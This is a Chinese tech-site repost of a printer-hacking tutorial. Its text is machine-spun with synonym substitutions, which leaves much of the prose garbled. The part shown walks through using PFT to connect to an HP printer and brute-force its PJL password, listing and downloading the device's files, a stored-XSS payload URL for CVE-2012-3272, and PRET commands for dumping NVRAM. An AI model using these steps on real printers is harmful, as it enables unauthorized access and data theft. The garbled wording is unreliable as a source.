加入收藏 | 设为首页 | 会员中心 | 我要投稿 湖南网 (https://www.hunanwang.cn/)- 科技、建站、经验、云计算、5G、大数据,站长网!
当前位置: 首页 > 建站 > 正文

不行忽视的打印机裂痕研究

发布时间:2019-06-19 21:32:59 所属栏目:建站 来源:VoltCary
导读:一、媒介 颠末最近一段时刻测试,发明企业内网打印机存在多种裂痕,同时也常常被各人所忽略,因此才有本文的研究。当一台打印机毗连收集,可以举办端口扫描、读写上传恶意文件、反弹shell,相等于一台处事器。 常见进攻,信息泄漏,如会见内存,也许发明密

按照文章前面部门,也或许知道了打印机进攻是基于打印机说话呼吁,如输入PJL呼吁造成相干,必要把握PJL呼吁,输入PJL呼吁较量贫困,这里有一个强盛的打印机框架器材PFT, 而行使PFT器材可以无需把握PJL呼吁,每一个参数已内置打印机说话,只必要挪用对应参数来操作,共同help查察。

行使教程:

(1) PFT毗连到打印机

  1. pft> server 192.168.15.200 
  2. Server set to 192.168.15.200 
  3. pft> port 9100 
  4. Port set to 9100 
  5. pft> connect 
  6. Connected to 192.168.15.200:9100 
  7. Device: hp LaserJet 4250 

(2) PFT破除PJL措施掩护

破除乐成之后,也能登录web节制台页面。

  1. pft> env bruteforce 
  2. try 30 
  3. INFO: force_recv_clear() timed out for 270bytes (10 sec) 
  4. Password disabled successfully 

(3) 查察硬盘文件

一样平常高级的打印机遇有硬盘,如下呼吁查察有哪些盘符。

  1. pft> volumes 
  2. Volume       Size       Free        Location      Label     Status 
  3. 0:   12619776   11786240             RAM          ? READ-WRITE 

(4) ls查察文件

  1. pft> ls 
  2. 0: 
  3. .                             -          d 
  4. ..                            -          d 
  5. PostScript                    -          d 
  6. PJL                           -          d 
  7. saveDevice                    -          d 
  8. webServer                     -          d 

(5) 将文件下载到当地get 文件名

5. HP JetDirect打印机存储型XSS

进攻者必需会见HP镭射打印机设置页面,”Product_URL”和”Tech_URL”参数 存在裂痕,对应CVE号:CVE-2012-3272。

点击WEB的“支持信息” 毗连,按如下输入:

image.png

点击“Apply”按钮,跳转到支持页面中(support.htm),呈现弹框。

不行忽视的打印机裂痕研究

测试要领:

http://[server]/support_param.html/config?Admin_Name=&Admin_Phone=&Product_URL=[XSS]&Tech_URL=[XSS]&Apply=Apply

6. 打印节制使命

PERT毗连到打印机,并实行操作打印机所行使的打印机说话(今朝支持PS,PJL和PCL),如python pret.py IP PS可实行挪用打印机PS说话举办操纵,一旦行使PRET毗连到打印机中的一个成果,我们将可以做许多工作。譬喻搜查文件体系,建设目次,变动设置文件、dump整个NVRAM。

如输出打印“Foo”,执行cross topsecret Foo:

image.png

打印如下:

image.png

7. 固件裂痕

假如打印机不存在PJL呼吁执行裂痕,可针对固件裂痕测试,通过nmap发明固件版本,Linux_Exploit_Suggester.pl查询内核版本裂痕。

nmap扫描出如下:

image.png

执行perl Linux_Exploit_Suggester.pl -k 2.6.31:

image.png

PS:该器材只能查询内核3.4.4之前的裂痕信息。

github下载:

https://github.com/InteliSecureLabs/Linux_Exploit_Suggester

五、总结

(编辑:湖南网)

【声明】本站内容均来自网络,其相关言论仅代表作者个人观点,不代表本站立场。若无意侵犯到您的权利,请及时与联系站长删除相关内容!

热点阅读